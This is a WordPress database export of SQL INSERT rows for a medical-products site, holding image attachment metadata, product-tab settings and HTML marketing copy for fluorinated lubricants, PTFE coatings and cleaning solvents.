INSERT INTO `wp_postmeta` VALUES (14643, 1356, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2555;s:6:"height";i:1651;s:4:"file";s:14:"2016/08/Mi.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:14:"Mi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:14:"Mi-800x517.jpg";s:5:"width";i:800;s:6:"height";i:517;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:14:"Mi-768x496.jpg";s:5:"width";i:768;s:6:"height";i:496;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:16:"Mi-1600x1034.jpg";s:5:"width";i:1600;s:6:"height";i:1034;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:14:"Mi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:14:"Mi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:14:"Mi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:14:"Mi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14644, 468, '_thumbnail_id', '1356'); 
INSERT INTO `wp_postmeta` VALUES (14645, 468, '716_default_editor', '<p class="Body"><span class="C-12"><strong><img class="wp-image-1360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/wp7619bf38_06-e1473348037855.png" alt="wp7619bf38_06" width="167" height="169" /></strong></span><span class="C-12"><strong>Single and Multi-<wbr />Use Surgical Device Housings</strong>:</span></p>\r\n<p class="Body"><span class="C-8">TriboSys™ is a high-<wbr />performance fluorinated lubricant that exhibits exceptional stability and will minimize mechanical wear </span><span class="C-8">allowing critical surgical devices to perform reliably and as designed. These biocompatible oils and greases are non-<wbr />nutrient ensuring microbial.</span></p>\r\n<p class="Body">.</p>\r\n<p class="Body"><img class="wp-image-1361 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/ML4-800x517.jpg" alt="ML4" width="170" height="110" /><strong>Compressed Medical Gases:</strong></p>\r\n<p class="Body">TriboSys™ grease is chemically inert and oxygen stable. This makes MilLube™ the lubricant of choice for medical gas cylinders, anesthesia machines, and oxygen valves.</p>'); 
INSERT INTO `wp_postmeta` VALUES (14646, 468, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14647, 1357, '_wp_attached_file', '2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14648, 1357, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4992;s:6:"height";i:3328;s:4:"file";s:52:"2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:52:"Fluoropolymer-coating-Catheter-guidewire-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:52:"Fluoropolymer-coating-Catheter-guidewire-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:52:"Fluoropolymer-coating-Catheter-guidewire-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:54:"Fluoropolymer-coating-Catheter-guidewire-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:52:"Fluoropolymer-coating-Catheter-guidewire-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:52:"Fluoropolymer-coating-Catheter-guidewire-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:52:"Fluoropolymer-coating-Catheter-guidewire-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:52:"Fluoropolymer-coating-Catheter-guidewire-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14649, 469, '_thumbnail_id', '1357'); 
INSERT INTO `wp_postmeta` VALUES (14650, 469, '716_default_editor', '<img class="wp-image-1364 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/canstockphoto8701169-800x532.jpg" alt="canstockphoto8701169" width="250" height="166" />\r\n<p class="Body"><strong><span class="C-12">Vascular guide wire</span></strong></p>\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s PTFE coatings are specifically designed for unmatched adhesion and coefficient of friction in vascular guide wires. Our coatings ensure smooth wire insertion, easy of traversing, and reduction in vascular spasms.</span></p>\r\n<p class="Body">.</p>\r\n<p class="Body"><img class="wp-image-1363 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/canstockphoto16166200-800x602.jpg" alt="canstockphoto16166200" width="252" height="189" /></p>\r\n<p class="Body"><strong><span class="C-12">Disposable/Nondisposable Cautery</span></strong></p>\r\n<p class="Body"><span class="C-8">The low coefficient of friction of our PTFE coatings minimizes biological deposits during cauterization and the uniform, thin film does not hinder the heat tranfer properties of the electrode.</span></p>'); 
INSERT INTO `wp_postmeta` VALUES (14651, 469, '719_default_editor', 'These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.\r\n<ul>\r\n 	<li><span class="C-14">ASTM 1894 Coefficient of Friction</span></li>\r\n 	<li><span class="C-14"> ASTM D3359 Adhesion Test </span></li>\r\n 	<li><span class="C-14">ISO 7802 Wire Wrap Test</span></li>\r\n 	<li><span class="C-14"> ISO 11070 Corrosion Resistance Test.</span></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14652, 1358, '_wp_attached_file', '2016/08/MMF_1657.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14653, 1358, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1431;s:6:"height";i:1073;s:4:"file";s:20:"2016/08/MMF_1657.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MMF_1657-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MMF_1657-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MMF_1657-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MMF_1657-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MMF_1657-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MMF_1657-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MMF_1657-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:12:"Mourad Fahmi";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:10:"1453312593";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14654, 467, '_thumbnail_id', '1358'); 
INSERT INTO `wp_postmeta` VALUES (14655, 467, '716_default_editor', '<img class="wp-image-1369 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/wp269fdbab_05_06-e1473358863416.jpg" alt="wp269fdbab_05_06" width="249" height="189" /><strong>Medical-<wbr />grade Tubing and Catheters</strong>\r\n<p class="Body"><span class="C-8">MilGlide™ can be used in a variety of thermoplastic and thermosetting tube resins, and is specially designed to bloom to the surface. Outer and Inner diameter surfaces exhibits dramatically lower coefficients of friction. This reduces mechanical wear on extrusion equipment, eliminates die build up, and increases the desired properties of the catheter tubing.</span></p>\r\n<p class="Body">.</p>\r\n<p class="Body"><img class="wp-image-1370 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/canstockphoto0300365-800x532.jpg" alt="canstockphoto0300365" width="253" height="168" /></p>\r\n<p class="Body"><strong><span class="C-12">Blown and Cast Films</span></strong></p>\r\n<p class="Body"><span class="C-8">MilGlide™ offers not only increased surface slip but also an inherent hydrophobic barrier to applied medical devices. Such applications include blood pressure cuffs, inflatable cuffs, and other TPU applications.</span></p>'); 
INSERT INTO `wp_postmeta` VALUES (14656, 467, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14657, 473, '716_default_editor', '<img class="wp-image-1373 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/S2-800x600.jpg" alt="S2" width="247" height="185" />\r\n<p class="Body"><strong><span class="C-12">Precision Cleaning</span></strong></p>\r\n<p class="Body"><span class="C-8">Todays\' advanced medical devices require solvents that can thoroughly clean away residues and particles while minimizing exposure of the operator to hazardous fumes. MilSolv™ offers efficient, non-<wbr />flammable, and low VOC/GWP solvents for all medical-<wbr />grade cleaning process.</span></p>\r\n<p class="Body">.</p>\r\n<p class="Body"><img class="wp-image-1372 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/S4-800x532.jpg" alt="S4" width="248" height="164" /></p>\r\n<p class="Body"><strong>Medical Clean Rooms</strong></p>\r\n<p class="Body">MilSolv™ solvents are ultra-<wbr />high purity chemical solutions for all medical clean room applications. Both MilSolv™  offers solutions with high cleaning indexes and surface wetting coefficients, two critical factors when defining an effective solvent cleaning system.</p>'); 
INSERT INTO `wp_postmeta` VALUES (14658, 473, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14659, 1360, '_wp_attached_file', '2016/08/wp7619bf38_06-e1473348037855.png'); 
INSERT INTO `wp_postmeta` VALUES (14660, 1360, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:225;s:6:"height";i:228;s:4:"file";s:40:"2016/08/wp7619bf38_06-e1473348037855.png";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"wp7619bf38_06-e1473348037855-200x200.png";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"wp7619bf38_06-e1473348037855-225x225.png";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14661, 1360, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:225;s:6:"height";i:228;s:4:"file";s:17:"wp7619bf38_06.png";}}'); 
INSERT INTO `wp_postmeta` VALUES (14662, 1361, '_wp_attached_file', '2016/08/ML4.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14663, 1361, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1940;s:4:"file";s:15:"2016/08/ML4.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:15:"ML4-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:15:"ML4-800x517.jpg";s:5:"width";i:800;s:6:"height";i:517;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:15:"ML4-768x497.jpg";s:5:"width";i:768;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:17:"ML4-1600x1035.jpg";s:5:"width";i:1600;s:6:"height";i:1035;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:15:"ML4-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:15:"ML4-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:15:"ML4-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:15:"ML4-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14664, 1362, '_wp_attached_file', '2016/08/2A.png'); 
INSERT INTO `wp_postmeta` VALUES (14665, 1362, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:14:"2016/08/2A.png";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:14:"2A-340x340.png";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:9:"image/png";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:14:"2A-250x250.png";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:14:"2A-200x200.png";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:14:"2A-225x225.png";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:9:"image/png";}s:11:"shop_single";a:4:{s:4:"file";s:14:"2A-510x600.png";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14666, 1363, '_wp_attached_file', '2016/08/canstockphoto16166200.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14667, 1363, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2257;s:4:"file";s:33:"2016/08/canstockphoto16166200.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto16166200-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto16166200-800x602.jpg";s:5:"width";i:800;s:6:"height";i:602;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto16166200-768x578.jpg";s:5:"width";i:768;s:6:"height";i:578;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto16166200-1600x1204.jpg";s:5:"width";i:1600;s:6:"height";i:1204;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto16166200-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto16166200-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto16166200-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto16166200-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14668, 1364, '_wp_attached_file', '2016/08/canstockphoto8701169.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14669, 1364, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1996;s:4:"file";s:32:"2016/08/canstockphoto8701169.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto8701169-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto8701169-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto8701169-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto8701169-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto8701169-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto8701169-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto8701169-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto8701169-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14670, 1106, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14672, 1367, '_edit_lock', '1473357127:3'); 
INSERT INTO `wp_postmeta` VALUES (14673, 1367, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (14674, 1367, '_ywtm_tab_type', 'global'); 
INSERT INTO `wp_postmeta` VALUES (14675, 1367, '_ywtm_show_tab', '1'); 
INSERT INTO `wp_postmeta` VALUES (14676, 1367, '_ywtm_order_tab', '2'); 
INSERT INTO `wp_postmeta` VALUES (14677, 1367, '_ywtm_icon_tab', 'a:3:{s:6:"select";s:4:"icon";s:4:"icon";s:17:"FontAwesome:gears";s:6:"custom";s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (14678, 1367, '_ywtm_layout_type', 'default'); 
INSERT INTO `wp_postmeta` VALUES (14679, 1367, '_ywtm_enable_custom_content', '0'); 
INSERT INTO `wp_postmeta` VALUES (14680, 1367, '_ywtm_gallery_columns', '1'); 
INSERT INTO `wp_postmeta` VALUES (14681, 1367, '_ywtm_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (14682, 1367, '_ywtm_video', 'a:1:{s:7:"columns";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (14683, 1367, '_ywtm_google_map_full_width', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (14684, 1367, '_ywtm_google_map_width', '100'); 
INSERT INTO `wp_postmeta` VALUES (14685, 1367, '_ywtm_google_map_height', '100'); 
INSERT INTO `wp_postmeta` VALUES (14686, 1367, '_ywtm_google_map_overlay_address', ''); 
INSERT INTO `wp_postmeta` VALUES (14687, 1367, '_ywtm_google_map_overlay_zoom', '15'); 
INSERT INTO `wp_postmeta` VALUES (14688, 1367, '_ywtm_text_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (14689, 1367, '_ywtm_shortcode_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (14690, 469, '1367_default_editor', '<ul>\r\n 	<li><strong>Water-based; Non Cr(VI) One Coat System</strong></li>\r\n 	<li><strong>Water-based; Non Cr(VI) One Coat System (Low-Bake)</strong> Ideal for Nitinol</li>\r\n 	<li><strong>Water-based; Non Cr(VI) Two-Coat System</strong></li>\r\n 	<li><strong>Water-based; Acid Primer One Coat</strong></li>\r\n 	<li><strong>Solvent-based;</strong> <strong>Non Cr(VI) Two-Coat System</strong></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14691, 468, '1367_default_editor', '<p class="Body"><strong><span class="C-12">TriboSys Medical Oils and Greases</span></strong></p>\r\n<p class="Body"><span class="C-8">● TriboSys oil (MS3100-<wbr />3170MD) offers seven viscosity grades of fluorinated synthetic oil to meet all medical application requirements</span></p>\r\n<p class="Body"><span class="C-8">● TriboSys grease (MS3200-<wbr />3270MD) is a fluorinated synthetic oil fortified and thickened with PTFE fluoropolymer to further enhanced its lubrication properties.</span></p>'); 
INSERT INTO `wp_postmeta` VALUES (14692, 1368, '_wp_attached_file', '2016/08/Fluoropolymer-PTFE-coatings-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14693, 469, '318_custom_list_file', 'a:1:{s:32:"30ff89542ba7640df9b769f1090be01a";a:3:{s:4:"name";s:27:"Fluoropolymer PTFE Coatings";s:4:"file";s:94:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Fluoropolymer-PTFE-coatings-1.pdf";s:4:"desc";s:31:"Fluoropolymer PTFE Coatings TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (14694, 1369, '_wp_attached_file', '2016/08/wp269fdbab_05_06-e1473358863416.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14695, 1369, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:300;s:6:"height";i:228;s:4:"file";s:43:"2016/08/wp269fdbab_05_06-e1473358863416.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"wp269fdbab_05_06-e1473358863416-250x228.jpg";s:5:"width";i:250;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"wp269fdbab_05_06-e1473358863416-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"wp269fdbab_05_06-e1473358863416-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14696, 1369, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:300;s:6:"height";i:228;s:4:"file";s:20:"wp269fdbab_05_06.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (14697, 1370, '_wp_attached_file', '2016/08/canstockphoto0300365.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14698, 1370, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3008;s:6:"height";i:2000;s:4:"file";s:32:"2016/08/canstockphoto0300365.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0300365-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto0300365-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto0300365-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto0300365-1600x1064.jpg";s:5:"width";i:1600;s:6:"height";i:1064;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0300365-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0300365-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto0300365-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto0300365-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
